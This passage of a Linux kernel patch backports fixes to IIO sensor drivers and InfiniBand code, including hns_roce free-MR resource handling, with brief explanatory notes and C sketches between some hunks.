+ 	 * with 'IRQF_NO_AUTOEN' anyways.
+ 	 */
+ 	if (!adis->data->unmasked_drdy)
+-		adis_enable_irq(adis, false);
++		__adis_enable_irq(adis, false);
+ 
+ 	if (!adis->data->prod_id_reg)
+ 		return 0;
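
With the unlocked __adis_enable_irq() now the exported symbol, callers that do not already hold state_lock presumably go through a locked wrapper added in the companion header change, along these lines (a sketch, not the verbatim header):

	static inline int adis_enable_irq(struct adis *adis, bool enable)
	{
		int ret;

		mutex_lock(&adis->state_lock);
		ret = __adis_enable_irq(adis, enable);
		mutex_unlock(&adis->state_lock);

		return ret;
	}
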
+diff --git a/drivers/iio/industrialio-event.c b/drivers/iio/industrialio-event.c
+index 3d78da2531a9a..727e2ef66aa4b 100644
+--- a/drivers/iio/industrialio-event.c
++++ b/drivers/iio/industrialio-event.c
+@@ -556,7 +556,7 @@ int iio_device_register_eventset(struct iio_dev *indio_dev)
+ 
+ 	ret = iio_device_register_sysfs_group(indio_dev, &ev_int->group);
+ 	if (ret)
+-		goto error_free_setup_event_lines;
++		goto error_free_group_attrs;
+ 
+ 	ev_int->ioctl_handler.ioctl = iio_event_ioctl;
+ 	iio_device_ioctl_handler_register(&iio_dev_opaque->indio_dev,
+@@ -564,6 +564,8 @@ int iio_device_register_eventset(struct iio_dev *indio_dev)
+ 
+ 	return 0;
+ 
++error_free_group_attrs:
++	kfree(ev_int->group.attrs);
+ error_free_setup_event_lines:
+ 	iio_free_chan_devattr_list(&ev_int->dev_attr_list);
+ 	kfree(ev_int);
+diff --git a/drivers/iio/temperature/ltc2983.c b/drivers/iio/temperature/ltc2983.c
+index a60ccf1836872..1117991ca2ab6 100644
+--- a/drivers/iio/temperature/ltc2983.c
++++ b/drivers/iio/temperature/ltc2983.c
+@@ -209,6 +209,7 @@ struct ltc2983_data {
+ 	 * Holds the converted temperature
+ 	 */
+ 	__be32 temp __aligned(IIO_DMA_MINALIGN);
++	__be32 chan_val;
+ };
+ 
+ struct ltc2983_sensor {
+@@ -313,19 +314,18 @@ static int __ltc2983_fault_handler(const struct ltc2983_data *st,
+ 	return 0;
+ }
+ 
+-static int __ltc2983_chan_assign_common(const struct ltc2983_data *st,
++static int __ltc2983_chan_assign_common(struct ltc2983_data *st,
+ 					const struct ltc2983_sensor *sensor,
+ 					u32 chan_val)
+ {
+ 	u32 reg = LTC2983_CHAN_START_ADDR(sensor->chan);
+-	__be32 __chan_val;
+ 
+ 	chan_val |= LTC2983_CHAN_TYPE(sensor->type);
+ 	dev_dbg(&st->spi->dev, "Assign reg:0x%04X, val:0x%08X\n", reg,
+ 		chan_val);
+-	__chan_val = cpu_to_be32(chan_val);
+-	return regmap_bulk_write(st->regmap, reg, &__chan_val,
+-				 sizeof(__chan_val));
++	st->chan_val = cpu_to_be32(chan_val);
++	return regmap_bulk_write(st->regmap, reg, &st->chan_val,
++				 sizeof(st->chan_val));
+ }
+ 
+ static int __ltc2983_chan_custom_sensor_assign(struct ltc2983_data *st,
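
Moving __chan_val off the stack into ltc2983_data is the IIO DMA-safety rule at work: buffers handed to regmap/SPI may be DMA'd, so they must live in heap-allocated driver state, and the first such member carries __aligned(IIO_DMA_MINALIGN) so the group occupies its own cacheline. The convention, roughly (field names illustrative):

	struct foo_state {
		struct spi_device *spi;	/* cold, CPU-only fields first */
		/* DMA-safe area: everything from here on gets its own cacheline */
		__be32 temp __aligned(IIO_DMA_MINALIGN);
		__be32 chan_val;	/* reused per transfer instead of a stack temp */
	};
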
+diff --git a/drivers/infiniband/Kconfig b/drivers/infiniband/Kconfig
+index aa36ac618e729..17a2274152771 100644
+--- a/drivers/infiniband/Kconfig
++++ b/drivers/infiniband/Kconfig
+@@ -78,6 +78,7 @@ config INFINIBAND_VIRT_DMA
+ 	def_bool !HIGHMEM
+ 
+ if INFINIBAND_USER_ACCESS || !INFINIBAND_USER_ACCESS
++if !UML
+ source "drivers/infiniband/hw/bnxt_re/Kconfig"
+ source "drivers/infiniband/hw/cxgb4/Kconfig"
+ source "drivers/infiniband/hw/efa/Kconfig"
+@@ -94,6 +95,7 @@ source "drivers/infiniband/hw/qib/Kconfig"
+ source "drivers/infiniband/hw/usnic/Kconfig"
+ source "drivers/infiniband/hw/vmw_pvrdma/Kconfig"
+ source "drivers/infiniband/sw/rdmavt/Kconfig"
++endif # !UML
+ source "drivers/infiniband/sw/rxe/Kconfig"
+ source "drivers/infiniband/sw/siw/Kconfig"
+ endif
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index b69e2c4e4d2a4..3c422698a51c1 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -2851,8 +2851,8 @@ err:
+ static void __exit ib_core_cleanup(void)
+ {
+ 	roce_gid_mgmt_cleanup();
+-	nldev_exit();
+ 	rdma_nl_unregister(RDMA_NL_LS);
++	nldev_exit();
+ 	unregister_pernet_device(&rdma_dev_net_ops);
+ 	unregister_blocking_lsm_notifier(&ibdev_lsm_nb);
+ 	ib_sa_cleanup();
+diff --git a/drivers/infiniband/core/mad.c b/drivers/infiniband/core/mad.c
+index 1893aa613ad73..674344eb8e2f4 100644
+--- a/drivers/infiniband/core/mad.c
++++ b/drivers/infiniband/core/mad.c
+@@ -59,9 +59,6 @@ static void create_mad_addr_info(struct ib_mad_send_wr_private *mad_send_wr,
+ 			  struct ib_mad_qp_info *qp_info,
+ 			  struct trace_event_raw_ib_mad_send_template *entry)
+ {
+-	u16 pkey;
+-	struct ib_device *dev = qp_info->port_priv->device;
+-	u32 pnum = qp_info->port_priv->port_num;
+ 	struct ib_ud_wr *wr = &mad_send_wr->send_wr;
+ 	struct rdma_ah_attr attr = {};
+ 
+@@ -69,8 +66,6 @@ static void create_mad_addr_info(struct ib_mad_send_wr_private *mad_send_wr,
+ 
+ 	/* These are common */
+ 	entry->sl = attr.sl;
+-	ib_query_pkey(dev, pnum, wr->pkey_index, &pkey);
+-	entry->pkey = pkey;
+ 	entry->rqpn = wr->remote_qpn;
+ 	entry->rqkey = wr->remote_qkey;
+ 	entry->dlid = rdma_ah_get_dlid(&attr);
+diff --git a/drivers/infiniband/core/nldev.c b/drivers/infiniband/core/nldev.c
+index 12dc97067ed2b..222733a83ddb7 100644
+--- a/drivers/infiniband/core/nldev.c
++++ b/drivers/infiniband/core/nldev.c
+@@ -513,7 +513,7 @@ static int fill_res_qp_entry(struct sk_buff *msg, bool has_cap_net_admin,
+ 
+ 	/* In create_qp() port is not set yet */
+ 	if (qp->port && nla_put_u32(msg, RDMA_NLDEV_ATTR_PORT_INDEX, qp->port))
+-		return -EINVAL;
++		return -EMSGSIZE;
+ 
+ 	ret = nla_put_u32(msg, RDMA_NLDEV_ATTR_RES_LQPN, qp->qp_num);
+ 	if (ret)
+@@ -552,7 +552,7 @@ static int fill_res_cm_id_entry(struct sk_buff *msg, bool has_cap_net_admin,
+ 	struct rdma_cm_id *cm_id = &id_priv->id;
+ 
+ 	if (port && port != cm_id->port_num)
+-		return 0;
++		return -EAGAIN;
+ 
+ 	if (cm_id->port_num &&
+ 	    nla_put_u32(msg, RDMA_NLDEV_ATTR_PORT_INDEX, cm_id->port_num))
+@@ -894,6 +894,8 @@ static int fill_stat_counter_qps(struct sk_buff *msg,
+ 	int ret = 0;
+ 
+ 	table_attr = nla_nest_start(msg, RDMA_NLDEV_ATTR_RES_QP);
++	if (!table_attr)
++		return -EMSGSIZE;
+ 
+ 	rt = &counter->device->res[RDMA_RESTRACK_QP];
+ 	xa_lock(&rt->xa);
+diff --git a/drivers/infiniband/core/restrack.c b/drivers/infiniband/core/restrack.c
+index 1f935d9f61785..01a499a8b88db 100644
+--- a/drivers/infiniband/core/restrack.c
++++ b/drivers/infiniband/core/restrack.c
+@@ -343,8 +343,6 @@ void rdma_restrack_del(struct rdma_restrack_entry *res)
+ 	rt = &dev->res[res->type];
+ 
+ 	old = xa_erase(&rt->xa, res->id);
+-	if (res->type == RDMA_RESTRACK_MR)
+-		return;
+ 	WARN_ON(old != res);
+ 
+ out:
+diff --git a/drivers/infiniband/core/sysfs.c b/drivers/infiniband/core/sysfs.c
+index 84c53bd2a52db..ee59d73915689 100644
+--- a/drivers/infiniband/core/sysfs.c
++++ b/drivers/infiniband/core/sysfs.c
+@@ -1213,6 +1213,9 @@ static struct ib_port *setup_port(struct ib_core_device *coredev, int port_num,
+ 	p->port_num = port_num;
+ 	kobject_init(&p->kobj, &port_type);
+ 
++	if (device->port_data && is_full_dev)
++		device->port_data[port_num].sysfs = p;
++
+ 	cur_group = p->groups_list;
+ 	ret = alloc_port_table_group("gids", &p->groups[0], p->attrs_list,
+ 				     attr->gid_tbl_len, show_port_gid);
+@@ -1258,9 +1261,6 @@ static struct ib_port *setup_port(struct ib_core_device *coredev, int port_num,
+ 	}
+ 
+ 	list_add_tail(&p->kobj.entry, &coredev->port_list);
+-	if (device->port_data && is_full_dev)
+-		device->port_data[port_num].sysfs = p;
+-
+ 	return p;
+ 
+ err_groups:
+@@ -1268,6 +1268,8 @@ err_groups:
+ err_del:
+ 	kobject_del(&p->kobj);
+ err_put:
++	if (device->port_data && is_full_dev)
++		device->port_data[port_num].sysfs = NULL;
+ 	kobject_put(&p->kobj);
+ 	return ERR_PTR(ret);
+ }
+@@ -1276,14 +1278,17 @@ static void destroy_port(struct ib_core_device *coredev, struct ib_port *port)
+ {
+ 	bool is_full_dev = &port->ibdev->coredev == coredev;
+ 
+-	if (port->ibdev->port_data &&
+-	    port->ibdev->port_data[port->port_num].sysfs == port)
+-		port->ibdev->port_data[port->port_num].sysfs = NULL;
+ 	list_del(&port->kobj.entry);
+ 	if (is_full_dev)
+ 		sysfs_remove_groups(&port->kobj, port->ibdev->ops.port_groups);
++
+ 	sysfs_remove_groups(&port->kobj, port->groups_list);
+ 	kobject_del(&port->kobj);
++
++	if (port->ibdev->port_data &&
++	    port->ibdev->port_data[port->port_num].sysfs == port)
++		port->ibdev->port_data[port->port_num].sysfs = NULL;
++
+ 	kobject_put(&port->kobj);
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/affinity.c b/drivers/infiniband/hw/hfi1/affinity.c
+index 877f8e84a672a..77ee77d4000fb 100644
+--- a/drivers/infiniband/hw/hfi1/affinity.c
++++ b/drivers/infiniband/hw/hfi1/affinity.c
+@@ -177,6 +177,8 @@ out:
+ 	for (node = 0; node < node_affinity.num_possible_nodes; node++)
+ 		hfi1_per_node_cntr[node] = 1;
+ 
++	pci_dev_put(dev);
++
+ 	return 0;
+ }
+ 
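
The hfi1 affinity fix plugs a reference leak: pci_get_device() returns a reference-counted device, so a one-shot lookup must drop the reference once the information has been read. A hedged sketch of the balanced pattern:

	struct pci_dev *dev;

	dev = pci_get_device(PCI_VENDOR_ID_INTEL, PCI_ANY_ID, NULL);
	if (dev) {
		/* ... read what is needed from dev ... */
		pci_dev_put(dev);	/* balance the get once done */
	}
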
+diff --git a/drivers/infiniband/hw/hfi1/firmware.c b/drivers/infiniband/hw/hfi1/firmware.c
+index 1d77514ebbee0..0c0cef5b1e0e5 100644
+--- a/drivers/infiniband/hw/hfi1/firmware.c
++++ b/drivers/infiniband/hw/hfi1/firmware.c
+@@ -1743,6 +1743,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 
+ 	if (!dd->platform_config.data) {
+ 		dd_dev_err(dd, "%s: Missing config file\n", __func__);
++		ret = -EINVAL;
+ 		goto bail;
+ 	}
+ 	ptr = (u32 *)dd->platform_config.data;
+@@ -1751,6 +1752,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 	ptr++;
+ 	if (magic_num != PLATFORM_CONFIG_MAGIC_NUM) {
+ 		dd_dev_err(dd, "%s: Bad config file\n", __func__);
++		ret = -EINVAL;
+ 		goto bail;
+ 	}
+ 
+@@ -1774,6 +1776,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 	if (file_length > dd->platform_config.size) {
+ 		dd_dev_info(dd, "%s:File claims to be larger than read size\n",
+ 			    __func__);
++		ret = -EINVAL;
+ 		goto bail;
+ 	} else if (file_length < dd->platform_config.size) {
+ 		dd_dev_info(dd,
+@@ -1794,6 +1797,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 			dd_dev_err(dd, "%s: Failed validation at offset %ld\n",
+ 				   __func__, (ptr - (u32 *)
+ 					      dd->platform_config.data));
++			ret = -EINVAL;
+ 			goto bail;
+ 		}
+ 
+@@ -1837,6 +1841,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 					   __func__, table_type,
+ 					   (ptr - (u32 *)
+ 					    dd->platform_config.data));
++				ret = -EINVAL;
+ 				goto bail; /* We don't trust this file now */
+ 			}
+ 			pcfgcache->config_tables[table_type].table = ptr;
+@@ -1856,6 +1861,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 					   __func__, table_type,
+ 					   (ptr -
+ 					    (u32 *)dd->platform_config.data));
++				ret = -EINVAL;
+ 				goto bail; /* We don't trust this file now */
+ 			}
+ 			pcfgcache->config_tables[table_type].table_metadata =
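
Every firmware.c hunk above fixes the same bug class: `goto bail` taken while ret still holds 0 from an earlier success, so the caller sees a bogus success. A minimal runnable illustration of the corrected pattern:

	#include <errno.h>
	#include <stdio.h>

	static int parse(int magic_ok)
	{
		int ret = 0;	/* stays 0 unless every exit path sets it */

		if (!magic_ok) {
			ret = -EINVAL;	/* the fix: set ret before every goto bail */
			goto bail;
		}
		/* ... further validation, each failure also setting ret ... */

	bail:
		return ret;
	}

	int main(void)
	{
		printf("bad file -> %d\n", parse(0));	/* -22, not 0 */
		return 0;
	}
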
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index 723e55a7de8d9..f701cc86896b3 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -202,6 +202,7 @@ struct hns_roce_ucontext {
+ 	struct list_head	page_list;
+ 	struct mutex		page_mutex;
+ 	struct hns_user_mmap_entry *db_mmap_entry;
++	u32			config;
+ };
+ 
+ struct hns_roce_pd {
+@@ -334,6 +335,7 @@ struct hns_roce_wq {
+ 	u32		head;
+ 	u32		tail;
+ 	void __iomem	*db_reg;
++	u32		ext_sge_cnt;
+ };
+ 
+ struct hns_roce_sge {
+@@ -635,6 +637,7 @@ struct hns_roce_qp {
+ 	struct list_head	rq_node; /* all recv qps are on a list */
+ 	struct list_head	sq_node; /* all send qps are on a list */
+ 	struct hns_user_mmap_entry *dwqe_mmap_entry;
++	u32			config;
+ };
+ 
+ struct hns_roce_ib_iboe {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 1435fe2ea176f..b2421883993b1 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -192,7 +192,6 @@ static int fill_ext_sge_inl_data(struct hns_roce_qp *qp,
+ 				 unsigned int *sge_idx, u32 msg_len)
+ {
+ 	struct ib_device *ibdev = &(to_hr_dev(qp->ibqp.device))->ib_dev;
+-	unsigned int ext_sge_sz = qp->sq.max_gs * HNS_ROCE_SGE_SIZE;
+ 	unsigned int left_len_in_pg;
+ 	unsigned int idx = *sge_idx;
+ 	unsigned int i = 0;
+@@ -200,7 +199,7 @@ static int fill_ext_sge_inl_data(struct hns_roce_qp *qp,
+ 	void *addr;
+ 	void *dseg;
+ 
+-	if (msg_len > ext_sge_sz) {
++	if (msg_len > qp->sq.ext_sge_cnt * HNS_ROCE_SGE_SIZE) {
+ 		ibdev_err(ibdev,
+ 			  "no enough extended sge space for inline data.\n");
+ 		return -EINVAL;
+@@ -1274,6 +1273,30 @@ static void update_cmdq_status(struct hns_roce_dev *hr_dev)
+ 		hr_dev->cmd.state = HNS_ROCE_CMDQ_STATE_FATAL_ERR;
+ }
+ 
++static int hns_roce_cmd_err_convert_errno(u16 desc_ret)
++{
++	struct hns_roce_cmd_errcode errcode_table[] = {
++		{CMD_EXEC_SUCCESS, 0},
++		{CMD_NO_AUTH, -EPERM},
++		{CMD_NOT_EXIST, -EOPNOTSUPP},
++		{CMD_CRQ_FULL, -EXFULL},
++		{CMD_NEXT_ERR, -ENOSR},
++		{CMD_NOT_EXEC, -ENOTBLK},
++		{CMD_PARA_ERR, -EINVAL},
++		{CMD_RESULT_ERR, -ERANGE},
++		{CMD_TIMEOUT, -ETIME},
++		{CMD_HILINK_ERR, -ENOLINK},
++		{CMD_INFO_ILLEGAL, -ENXIO},
++		{CMD_INVALID, -EBADR},
++	};
++	u16 i;
++
++	for (i = 0; i < ARRAY_SIZE(errcode_table); i++)
++		if (desc_ret == errcode_table[i].return_status)
++			return errcode_table[i].errno;
++	return -EIO;
++}
++
+ static int __hns_roce_cmq_send(struct hns_roce_dev *hr_dev,
+ 			       struct hns_roce_cmq_desc *desc, int num)
+ {
+@@ -1319,7 +1342,7 @@ static int __hns_roce_cmq_send(struct hns_roce_dev *hr_dev,
+ 			dev_err_ratelimited(hr_dev->dev,
+ 					    "Cmdq IO error, opcode = 0x%x, return = 0x%x.\n",
+ 					    desc->opcode, desc_ret);
+-			ret = -EIO;
++			ret = hns_roce_cmd_err_convert_errno(desc_ret);
+ 		}
+ 	} else {
+ 		/* FW/HW reset or incorrect number of desc */
+@@ -2024,13 +2047,14 @@ static void set_default_caps(struct hns_roce_dev *hr_dev)
+ 
+ 	caps->flags |= HNS_ROCE_CAP_FLAG_ATOMIC | HNS_ROCE_CAP_FLAG_MW |
+ 		       HNS_ROCE_CAP_FLAG_SRQ | HNS_ROCE_CAP_FLAG_FRMR |
+-		       HNS_ROCE_CAP_FLAG_QP_FLOW_CTRL | HNS_ROCE_CAP_FLAG_XRC;
++		       HNS_ROCE_CAP_FLAG_QP_FLOW_CTRL;
+ 
+ 	caps->gid_table_len[0] = HNS_ROCE_V2_GID_INDEX_NUM;
+ 
+ 	if (hr_dev->pci_dev->revision >= PCI_REVISION_ID_HIP09) {
+ 		caps->flags |= HNS_ROCE_CAP_FLAG_STASH |
+-			       HNS_ROCE_CAP_FLAG_DIRECT_WQE;
++			       HNS_ROCE_CAP_FLAG_DIRECT_WQE |
++			       HNS_ROCE_CAP_FLAG_XRC;
+ 		caps->max_sq_inline = HNS_ROCE_V3_MAX_SQ_INLINE;
+ 	} else {
+ 		caps->max_sq_inline = HNS_ROCE_V2_MAX_SQ_INLINE;
+@@ -2342,6 +2366,9 @@ static int hns_roce_query_pf_caps(struct hns_roce_dev *hr_dev)
+ 	caps->wqe_sge_hop_num = hr_reg_read(resp_d, PF_CAPS_D_EX_SGE_HOP_NUM);
+ 	caps->wqe_rq_hop_num = hr_reg_read(resp_d, PF_CAPS_D_RQWQE_HOP_NUM);
+ 
++	if (!(caps->page_size_cap & PAGE_SIZE))
++		caps->page_size_cap = HNS_ROCE_V2_PAGE_SIZE_SUPPORTED;
++
+ 	return 0;
+ }
+ 
+@@ -2631,31 +2658,124 @@ static void free_dip_list(struct hns_roce_dev *hr_dev)
+ 	spin_unlock_irqrestore(&hr_dev->dip_list_lock, flags);
+ }
+ 
+-static void free_mr_exit(struct hns_roce_dev *hr_dev)
++static struct ib_pd *free_mr_init_pd(struct hns_roce_dev *hr_dev)
++{
++	struct hns_roce_v2_priv *priv = hr_dev->priv;
++	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct hns_roce_pd *hr_pd;
++	struct ib_pd *pd;
++
++	hr_pd = kzalloc(sizeof(*hr_pd), GFP_KERNEL);
++	if (ZERO_OR_NULL_PTR(hr_pd))
++		return NULL;
++	pd = &hr_pd->ibpd;
++	pd->device = ibdev;
++
++	if (hns_roce_alloc_pd(pd, NULL)) {
++		ibdev_err(ibdev, "failed to create pd for free mr.\n");
++		kfree(hr_pd);
++		return NULL;
++	}
++	free_mr->rsv_pd = to_hr_pd(pd);
++	free_mr->rsv_pd->ibpd.device = &hr_dev->ib_dev;
++	free_mr->rsv_pd->ibpd.uobject = NULL;
++	free_mr->rsv_pd->ibpd.__internal_mr = NULL;
++	atomic_set(&free_mr->rsv_pd->ibpd.usecnt, 0);
++
++	return pd;
++}
++
++static struct ib_cq *free_mr_init_cq(struct hns_roce_dev *hr_dev)
+ {
+ 	struct hns_roce_v2_priv *priv = hr_dev->priv;
+ 	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct ib_cq_init_attr cq_init_attr = {};
++	struct hns_roce_cq *hr_cq;
++	struct ib_cq *cq;
++
++	cq_init_attr.cqe = HNS_ROCE_FREE_MR_USED_CQE_NUM;
++
++	hr_cq = kzalloc(sizeof(*hr_cq), GFP_KERNEL);
++	if (ZERO_OR_NULL_PTR(hr_cq))
++		return NULL;
++
++	cq = &hr_cq->ib_cq;
++	cq->device = ibdev;
++
++	if (hns_roce_create_cq(cq, &cq_init_attr, NULL)) {
++		ibdev_err(ibdev, "failed to create cq for free mr.\n");
++		kfree(hr_cq);
++		return NULL;
++	}
++	free_mr->rsv_cq = to_hr_cq(cq);
++	free_mr->rsv_cq->ib_cq.device = &hr_dev->ib_dev;
++	free_mr->rsv_cq->ib_cq.uobject = NULL;
++	free_mr->rsv_cq->ib_cq.comp_handler = NULL;
++	free_mr->rsv_cq->ib_cq.event_handler = NULL;
++	free_mr->rsv_cq->ib_cq.cq_context = NULL;
++	atomic_set(&free_mr->rsv_cq->ib_cq.usecnt, 0);
++
++	return cq;
++}
++
++static int free_mr_init_qp(struct hns_roce_dev *hr_dev, struct ib_cq *cq,
++			   struct ib_qp_init_attr *init_attr, int i)
++{
++	struct hns_roce_v2_priv *priv = hr_dev->priv;
++	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct hns_roce_qp *hr_qp;
++	struct ib_qp *qp;
+ 	int ret;
++
++	hr_qp = kzalloc(sizeof(*hr_qp), GFP_KERNEL);
++	if (ZERO_OR_NULL_PTR(hr_qp))
++		return -ENOMEM;
++
++	qp = &hr_qp->ibqp;
++	qp->device = ibdev;
++
++	ret = hns_roce_create_qp(qp, init_attr, NULL);
++	if (ret) {
++		ibdev_err(ibdev, "failed to create qp for free mr.\n");
++		kfree(hr_qp);
++		return ret;
++	}
++
++	free_mr->rsv_qp[i] = hr_qp;
++	free_mr->rsv_qp[i]->ibqp.recv_cq = cq;
++	free_mr->rsv_qp[i]->ibqp.send_cq = cq;
++
++	return 0;
++}
++
++static void free_mr_exit(struct hns_roce_dev *hr_dev)
++{
++	struct hns_roce_v2_priv *priv = hr_dev->priv;
++	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_qp *qp;
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(free_mr->rsv_qp); i++) {
+ 		if (free_mr->rsv_qp[i]) {
+-			ret = ib_destroy_qp(free_mr->rsv_qp[i]);
+-			if (ret)
+-				ibdev_err(&hr_dev->ib_dev,
+-					  "failed to destroy qp in free mr.\n");
+-
++			qp = &free_mr->rsv_qp[i]->ibqp;
++			hns_roce_v2_destroy_qp(qp, NULL);
++			kfree(free_mr->rsv_qp[i]);
+ 			free_mr->rsv_qp[i] = NULL;
+ 		}
+ 	}
+ 
+ 	if (free_mr->rsv_cq) {
+-		ib_destroy_cq(free_mr->rsv_cq);
++		hns_roce_destroy_cq(&free_mr->rsv_cq->ib_cq, NULL);
++		kfree(free_mr->rsv_cq);
+ 		free_mr->rsv_cq = NULL;
+ 	}
+ 
+ 	if (free_mr->rsv_pd) {
+-		ib_dealloc_pd(free_mr->rsv_pd);
++		hns_roce_dealloc_pd(&free_mr->rsv_pd->ibpd, NULL);
++		kfree(free_mr->rsv_pd);
+ 		free_mr->rsv_pd = NULL;
+ 	}
+ }
+@@ -2664,55 +2784,46 @@ static int free_mr_alloc_res(struct hns_roce_dev *hr_dev)
+ {
+ 	struct hns_roce_v2_priv *priv = hr_dev->priv;
+ 	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
+-	struct ib_device *ibdev = &hr_dev->ib_dev;
+-	struct ib_cq_init_attr cq_init_attr = {};
+ 	struct ib_qp_init_attr qp_init_attr = {};
+ 	struct ib_pd *pd;
+ 	struct ib_cq *cq;
+-	struct ib_qp *qp;
+ 	int ret;
+ 	int i;
+ 
+-	pd = ib_alloc_pd(ibdev, 0);
+-	if (IS_ERR(pd)) {
+-		ibdev_err(ibdev, "failed to create pd for free mr.\n");
+-		return PTR_ERR(pd);
+-	}
+-	free_mr->rsv_pd = pd;
++	pd = free_mr_init_pd(hr_dev);
++	if (!pd)
++		return -ENOMEM;
+ 
+-	cq_init_attr.cqe = HNS_ROCE_FREE_MR_USED_CQE_NUM;
+-	cq = ib_create_cq(ibdev, NULL, NULL, NULL, &cq_init_attr);
+-	if (IS_ERR(cq)) {
+-		ibdev_err(ibdev, "failed to create cq for free mr.\n");
+-		ret = PTR_ERR(cq);
+-		goto create_failed;
++	cq = free_mr_init_cq(hr_dev);
++	if (!cq) {
++		ret = -ENOMEM;
++		goto create_failed_cq;
+ 	}
+-	free_mr->rsv_cq = cq;
+ 
+ 	qp_init_attr.qp_type = IB_QPT_RC;
+ 	qp_init_attr.sq_sig_type = IB_SIGNAL_ALL_WR;
+-	qp_init_attr.send_cq = free_mr->rsv_cq;
+-	qp_init_attr.recv_cq = free_mr->rsv_cq;
++	qp_init_attr.send_cq = cq;
++	qp_init_attr.recv_cq = cq;
+ 	for (i = 0; i < ARRAY_SIZE(free_mr->rsv_qp); i++) {
+ 		qp_init_attr.cap.max_send_wr = HNS_ROCE_FREE_MR_USED_SQWQE_NUM;
+ 		qp_init_attr.cap.max_send_sge = HNS_ROCE_FREE_MR_USED_SQSGE_NUM;
+ 		qp_init_attr.cap.max_recv_wr = HNS_ROCE_FREE_MR_USED_RQWQE_NUM;
+ 		qp_init_attr.cap.max_recv_sge = HNS_ROCE_FREE_MR_USED_RQSGE_NUM;
+ 
+-		qp = ib_create_qp(free_mr->rsv_pd, &qp_init_attr);
+-		if (IS_ERR(qp)) {
+-			ibdev_err(ibdev, "failed to create qp for free mr.\n");
+-			ret = PTR_ERR(qp);
+-			goto create_failed;
+-		}
+-
+-		free_mr->rsv_qp[i] = qp;
++		ret = free_mr_init_qp(hr_dev, cq, &qp_init_attr, i);
++		if (ret)
++			goto create_failed_qp;
+ 	}
+ 
+ 	return 0;
+ 
+-create_failed:
+-	free_mr_exit(hr_dev);
++create_failed_qp:
++	hns_roce_destroy_cq(cq, NULL);
++	kfree(cq);
++
++create_failed_cq:
++	hns_roce_dealloc_pd(pd, NULL);
++	kfree(pd);
+ 
+ 	return ret;
+ }
+@@ -2728,14 +2839,17 @@ static int free_mr_modify_rsv_qp(struct hns_roce_dev *hr_dev,
+ 	int mask;
+ 	int ret;
+ 
+-	hr_qp = to_hr_qp(free_mr->rsv_qp[sl_num]);
++	hr_qp = to_hr_qp(&free_mr->rsv_qp[sl_num]->ibqp);
+ 	hr_qp->free_mr_en = 1;
++	hr_qp->ibqp.device = ibdev;
++	hr_qp->ibqp.qp_type = IB_QPT_RC;
+ 
+ 	mask = IB_QP_STATE | IB_QP_PKEY_INDEX | IB_QP_PORT | IB_QP_ACCESS_FLAGS;
+ 	attr->qp_state = IB_QPS_INIT;
+ 	attr->port_num = 1;
+ 	attr->qp_access_flags = IB_ACCESS_REMOTE_WRITE;
+-	ret = ib_modify_qp(&hr_qp->ibqp, attr, mask);
++	ret = hr_dev->hw->modify_qp(&hr_qp->ibqp, attr, mask, IB_QPS_INIT,
++				    IB_QPS_INIT);
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to modify qp to init, ret = %d.\n",
+ 			  ret);
+@@ -2756,7 +2870,8 @@ static int free_mr_modify_rsv_qp(struct hns_roce_dev *hr_dev,
+ 
+ 	rdma_ah_set_sl(&attr->ah_attr, (u8)sl_num);
+ 
+-	ret = ib_modify_qp(&hr_qp->ibqp, attr, mask);
++	ret = hr_dev->hw->modify_qp(&hr_qp->ibqp, attr, mask, IB_QPS_INIT,
++				    IB_QPS_RTR);
+ 	hr_dev->loop_idc = loopback;
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to modify qp to rtr, ret = %d.\n",
+@@ -2770,7 +2885,8 @@ static int free_mr_modify_rsv_qp(struct hns_roce_dev *hr_dev,
+ 	attr->sq_psn = HNS_ROCE_FREE_MR_USED_PSN;
+ 	attr->retry_cnt = HNS_ROCE_FREE_MR_USED_QP_RETRY_CNT;
+ 	attr->timeout = HNS_ROCE_FREE_MR_USED_QP_TIMEOUT;
+-	ret = ib_modify_qp(&hr_qp->ibqp, attr, mask);
++	ret = hr_dev->hw->modify_qp(&hr_qp->ibqp, attr, mask, IB_QPS_RTR,
++				    IB_QPS_RTS);
+ 	if (ret)
+ 		ibdev_err(ibdev, "failed to modify qp to rts, ret = %d.\n",
+ 			  ret);
+@@ -3186,7 +3302,8 @@ static int set_mtpt_pbl(struct hns_roce_dev *hr_dev,
+ 	int i, count;
+ 
+ 	count = hns_roce_mtr_find(hr_dev, &mr->pbl_mtr, 0, pages,
+-				  ARRAY_SIZE(pages), &pbl_ba);
++				  min_t(int, ARRAY_SIZE(pages), mr->npages),
++				  &pbl_ba);
+ 	if (count < 1) {
+ 		ibdev_err(ibdev, "failed to find PBL mtr, count = %d.\n",
+ 			  count);
+@@ -3414,7 +3531,7 @@ static void free_mr_send_cmd_to_hw(struct hns_roce_dev *hr_dev)
+ 	mutex_lock(&free_mr->mutex);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(free_mr->rsv_qp); i++) {
